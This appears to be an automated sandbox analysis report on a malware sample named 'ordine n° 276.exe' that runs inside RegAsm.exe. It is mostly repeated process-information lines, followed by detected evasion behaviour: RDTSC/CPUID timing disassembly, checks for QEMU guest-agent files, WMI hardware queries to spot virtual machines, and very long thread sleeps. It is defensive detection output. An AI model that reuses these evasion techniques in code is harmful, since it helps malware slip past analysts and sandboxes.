Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe

RDTSC instruction interceptor: First address: 00000000021723B7 second address: 00000000021723B7 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FF0B4859808h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d cmp dh, ch 0x0000001f pop ecx 0x00000020 add edi, edx 0x00000022 test ecx, 93E93443h 0x00000028 dec ecx 0x00000029 cmp ecx, 00000000h 0x0000002c jne 00007FF0B48597E6h 0x0000002e test cx, 1904h 0x00000033 push ecx 0x00000034 call 00007FF0B4859822h 0x00000039 call 00007FF0B4859818h 0x0000003e lfence 0x00000041 mov edx, dword ptr [7FFE0014h] 0x00000047 lfence 0x0000004a ret 0x0000004b mov esi, edx 0x0000004d pushad 0x0000004e rdtsc

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Function Chain: systemQueried,systemQueried,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried,systemQueried,threadDelayed,threadDelayed,systemQueried,threadDelayed,systemQueried,threadDelayed,threadDelayed,memAlloc,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadDelayed,keyOpened,keyEnumerated

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: ordine n#U00b0 276.exe, 00000000.00000002.749418679.0000000002180000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
Source: ordine n#U00b0 276.exe, 00000000.00000002.749418679.0000000002180000.00000004.00000001.sdmp, RegAsm.exe, 00000007.00000002.1031397639.00000000009B0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: RegAsm.exe, 00000007.00000002.1031397639.00000000009B0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	RDTSC instruction interceptor: First address: 00000000021723B7 second address: 00000000021723B7 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FF0B4859808h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d cmp dh, ch 0x0000001f pop ecx 0x00000020 add edi, edx 0x00000022 test ecx, 93E93443h 0x00000028 dec ecx 0x00000029 cmp ecx, 00000000h 0x0000002c jne 00007FF0B48597E6h 0x0000002e test cx, 1904h 0x00000033 push ecx 0x00000034 call 00007FF0B4859822h 0x00000039 call 00007FF0B4859818h 0x0000003e lfence 0x00000041 mov edx, dword ptr [7FFE0014h] 0x00000047 lfence 0x0000004a ret 0x0000004b mov esi, edx 0x0000004d pushad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\ordine n#U00b0 276.exe	RDTSC instruction interceptor: First address: 0000000002172528 second address: 0000000002172528 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FF0B4BA9AF0h 0x0000001d popad 0x0000001e call 00007FF0B4BA78EAh 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000D02528 second address: 0000000000D02528 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FF0B485BA20h 0x0000001d popad 0x0000001e call 00007FF0B485981Ah 0x00000023 lfence 0x00000026 rdtsc

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Window / User API: threadDelayed 785

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 5972	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 5972	Thread sleep time: -23550000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 5972	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 5972	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: RegAsm.exe, 00000007.00000002.1031709055.0000000000FEF000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWight Filter-0000
Source: RegAsm.exe, 00000007.00000002.1036867181.000000001FFB0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: RegAsm.exe, 00000007.00000002.1031709055.0000000000FEF000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: ordine n#U00b0 276.exe, 00000000.00000002.749418679.0000000002180000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe\syswow64\msvbvm60.dll
Source: RegAsm.exe, 00000007.00000002.1031669686.0000000000FA8000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW(
Source: RegAsm.exe, 00000007.00000002.1036867181.000000001FFB0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: ordine n#U00b0 276.exe, 00000000.00000002.749418679.0000000002180000.00000004.00000001.sdmp, RegAsm.exe, 00000007.00000002.1031397639.00000000009B0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: RegAsm.exe, 00000007.00000002.1036867181.000000001FFB0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
